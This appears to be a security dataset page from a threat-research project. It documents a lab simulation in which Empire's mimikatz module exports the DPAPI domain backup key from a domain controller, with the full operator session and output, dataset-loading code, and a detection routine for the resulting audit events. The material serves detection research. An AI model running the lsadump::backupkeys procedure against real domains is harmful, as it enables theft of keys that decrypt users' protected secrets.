Empire Mimikatz Backup Keys#

Metadata#

Contributors: Roberto Rodriguez @Cyb3rWard0g

Creation Date: 2019/05/18

Modification Date: 2020/09/21

Tactics: TA0006

Techniques: T1003

Tags: DPAPI, DPAPI Domain Backup key, RPC LSARPC

Dataset Description#

This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.

Simulation Metadata#

Tools#

type    Name      Module
----    ----      ------
C2      Empire    mimikatz_lsadump_backupkeys

Adversary View#

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
ALYH6ZB2 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4380   5/0.0    2020-10-22 18:24:28  http            

(Empire: agents) > interact ALYH6ZB2
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/
cache*           command          dcsync_hashdump  golden_ticket    logonpasswords*  mimitokens*      purge            silver_ticket    
certs*           dcsync           extract_tickets  keys*            lsadump*         pth*             sam*             trust_keys*      
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export
(Empire: powershell/credentials/mimikatz/command) > execute
[*] Tasked ALYH6ZB2 to run TASK_CMD_JOB
[*] Agent ALYH6ZB2 tasked with task ID 1
[*] Tasked agent ALYH6ZB2 to run module powershell/credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > 
Job started: 75WB4S

Hostname: WORKSTATION5.theshire.local / S-1-5-21-2323213074-4052461197-1785501644

  .#####.   mimikatz 2.2.0 (x64) #19041 Oct  4 2020 10:28:51
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > https://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export

Current prefered key:       {a0feda20-878f-4e68-ba74-d4df8f0191ab}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   : 
        |Implementation: CRYPT_IMPL_SOFTWARE ; 
        Algorithm      : CALG_RSA_KEYX
        Key size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key : YES
        Private export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.keyx.rsa.pvk'
        PFX container  : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.pfx'
        Export         : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.der'

Compatibility prefered key: {0343c16b-26f1-4e2c-83ed-90e443b3bfca}
  * Legacy key
        Export         : OK - 'ntds_legacy_0_0343c16b-26f1-4e2c-83ed-90e443b3bfca.key'
(Empire: powershell/credentials/mimikatz/command) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

# Download the zipped JSON-lines dataset and extract its single file into the working directory.
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip'
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail early on a bad download instead of on a corrupt zip
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

import pandas as pd

# Each line of the extracted file is one JSON event record.
df = pd.read_json(datasetJSONPath, lines=True)

Access Security Events#

# Count events per log channel to see which logs the dataset contains.
df.groupby(['Channel']).size().sort_values(ascending=False)
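As an added example that is not part of the original page or the Security-Datasets project, the following flags the DC-side audit trail of this simulation: a Security event 4662 on the domain controller whose ObjectName is one of the LSA backup key secrets (G$BCKUPKEY_PREFERRED, G$BCKUPKEY_P, G$BCKUPKEY_<guid>) and whose AccessMask has the read bit 0x2 set. Field names other than Channel are assumed from the Windows Security event schema as the dataset flattens it, and the sample records are constructed.

```python
import json
from typing import Iterable, List

# Field names (Channel, EventID, ObjectName, AccessMask, Hostname,
# SubjectUserName) are assumed to follow the Windows Security event schema
# as the dataset flattens it; only Channel is confirmed by the page above.
BACKUPKEY_MARKER = "BCKUPKEY"  # LSA secrets G$BCKUPKEY_PREFERRED, G$BCKUPKEY_P, G$BCKUPKEY_<guid>
QUERY_SECRET_MASK = 0x2        # AccessMask bit an LSARPC read of a secret value sets


def is_backupkey_read(event: dict) -> bool:
    """True for a Security 4662 audit that reads a DPAPI backup key secret."""
    if str(event.get("Channel", "")).lower() != "security":
        return False
    if str(event.get("EventID", "")) != "4662":
        return False
    if BACKUPKEY_MARKER not in str(event.get("ObjectName", "")).upper():
        return False
    try:
        mask = int(str(event.get("AccessMask", "0")), 16)
    except ValueError:
        return False
    return bool(mask & QUERY_SECRET_MASK)


def find_backupkey_reads(lines: Iterable[str]) -> List[dict]:
    """Scan JSON-lines records and return host/user/object for every hit."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated or malformed line must not abort the scan
        if isinstance(event, dict) and is_backupkey_read(event):
            hits.append({"host": event.get("Hostname"),
                         "user": event.get("SubjectUserName"),
                         "object": event.get("ObjectName")})
    return hits


# Constructed sample records (not from the dataset): a logon, a truncated
# line, and one read of the preferred backup key secret with AccessMask 0x2.
SAMPLE_LINES = [
    json.dumps({"Channel": "Security", "EventID": 4624, "Hostname": "MORDORDC.theshire.local"}),
    '{"Channel": "Security", "EventID": 4662, "ObjectName": "Policy\\Secr',
    json.dumps({"Channel": "Security", "EventID": 4662, "Hostname": "MORDORDC.theshire.local",
                "SubjectUserName": "pgustavo", "ObjectServer": "LSA",
                "ObjectName": "Policy\\Secrets\\G$BCKUPKEY_PREFERRED", "AccessMask": "0x2"}),
]
```

To run it over the dataset downloaded above, pass `open(datasetJSONPath)` as `lines`.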